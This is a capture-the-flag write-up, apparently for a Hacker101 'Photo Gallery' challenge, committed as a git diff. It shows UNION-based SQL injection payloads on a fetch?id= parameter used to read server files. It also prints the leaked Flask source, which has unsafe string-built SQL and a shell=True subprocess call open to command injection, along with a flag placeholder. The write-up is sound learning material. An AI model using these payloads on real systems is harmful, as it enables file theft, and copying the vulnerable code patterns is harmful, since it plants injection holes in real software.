photo gallery flag0

Author: testert1ng

README.md

@@ -11,7 +11,7 @@
 | Trivial (1 / flag)  | [A little something to get you started][2] | Web    | 1 / 1      |
 | Easy (2 / flag)     | [Micro-CMS v1][3]                          | Web    | 4 / 4      |
 | Moderate (3 / flag) | [Micro-CMS v2][5]                          | Web    | 3 / 3      |
-| Moderate (6 / flag) | [Photo Gallery][10]                        | Web    | 1 / 3      |
+| Moderate (6 / flag) | [Photo Gallery][10]                        | Web    | 2 / 3      |
 | Moderate (5 / flag) | [Cody's First Blog][8]                     | Web    | 3 / 3      |
 | Easy (4 / flag)     | [Postbook][6]                              | Web    | 7 / 7      |
 | Moderate (5 / flag) | [Ticketastic: Live Instance][9]            | Web    | 2 / 2      |

photo_gallery/README.md

@@ -1,6 +1,6 @@
 # Photo Gallery
 
-## [Flag0](./flag0) -- Not Found
+## [Flag0](./flag0) -- Found
 
 - Consider how you might build this system yourself. What would the query for fetch look like?
 - Take a few minutes to consider the state of the union

photo_gallery/flag0/README.md

@@ -0,0 +1,61 @@
+# Photo Gallery - FLAG0
+
+## 0x00 Check Image Source
+
+Based on [FLAG1][1], when fetch a image id, it will return a image from the **files** directory.
+
+http://127.0.0.1/xxxxxxxxxx/fetch?id=1
+
+| id | title            | parent | filename           |
+| -- | ---------------- | ------ | ------------------ |
+| 1  | Utterly adorable | 1      | files/adorable.jpg |
+| 2  | Purrfect         | 1      | files/purrfect.jpg |
+| 3  | Invisible        | 1      | FLAG1              |
+
+## 0x01 Arbitrary File Read
+
+Normally id is integer, so decimal may make an error here.
+
+```sql
+fetch?id=1.1
+```
+
+![](./imgs/notfound.jpg)
+
+So when do UNION SELECT with the image name, it loads the image 1 again.
+
+```sql
+id=1.1 UNION SELECT 'files/adorable.jpg' --
+```
+
+![](./imgs/adorable.jpg)
+
+## 0x02 [uwsgi-nginx-flask-docker][3]
+
+The [hint][4] shows the application run on [uwsgi-nginx-flask-docker][3]. So the configuration file is **uwsgi.ini**
+
+```sql
+id=1.1 UNION SELECT 'uwsgi.ini' --
+```
+
+The file shows
+
+```
+[uwsgi] module = main callable = app 
+```
+
+And the main file
+
+```sql
+id=1.1 UNION SELECT 'main.py' --
+```
+
+Can check the [main.py][2]
+
+![](./imgs/flag.jpg)
+
+
+[1]: ../flag1
+[2]: ./main.py
+[3]: https://github.com/tiangolo/uwsgi-nginx-flask-docker
+[4]: ../

photo_gallery/flag0/imgs/adorable.jpg

@@ -0,0 +1,56 @@
+from flask import Flask, abort, redirect, request, Response
+import base64, json, MySQLdb, os, re, subprocess
+
+app = Flask(__name__)
+
+home = '''
+<title>Magical Image Gallery</title>
+<h1>Magical Image Gallery</h1>
+$ALBUMS$
+'''
+
+viewAlbum = '''
+<title>$TITLE$ -- Magical Image Gallery</title>	
+<h1>$TITLE$</h1>
+$GALLERY$
+'''
+
+def getDb():
+	return MySQLdb.connect(host="localhost", user="root", password="", db="level5")
+
+def sanitize(data):
+	return data.replace('&amp;', '&amp;').replace('&lt;', '&lt;').replace('&gt;', '&gt;').replace('"', '"')
+
+@app.route('/')
+def index():
+	cur = getDb().cursor()
+	cur.execute('SELECT id, title FROM albums')
+	albums = list(cur.fetchall())
+
+	rep = ''
+	for id, title in albums:
+		rep += '<h2>%s</h2>\n' % sanitize(title)
+		rep += '<div>'
+		cur.execute('SELECT id, title, filename FROM photos WHERE parent=%s LIMIT 3', (id, ))
+		fns = []
+		for pid, ptitle, pfn in cur.fetchall():
+			rep += '<div><img src="fetch?id=%i" width="266" height="150"><br>%s</div>' % (pid, sanitize(ptitle))
+			fns.append(pfn)
+		rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'
+		rep += '</div>\n'
+
+	return home.replace('$ALBUMS$', rep)
+
+@app.route('/fetch')
+def fetch():
+	cur = getDb().cursor()
+	if cur.execute('SELECT filename FROM photos WHERE id=%s' % request.args['id']) == 0:
+		abort(404)
+
+	# It's dangerous to go alone, take this:
+	# ^FLAG^FLAG0$FLAG$
+
+	return file('./%s' % cur.fetchone()[0].replace('..', ''), 'rb').read()
+
+if __name__ == "__main__":
+	app.run(host='0.0.0.0', port=80)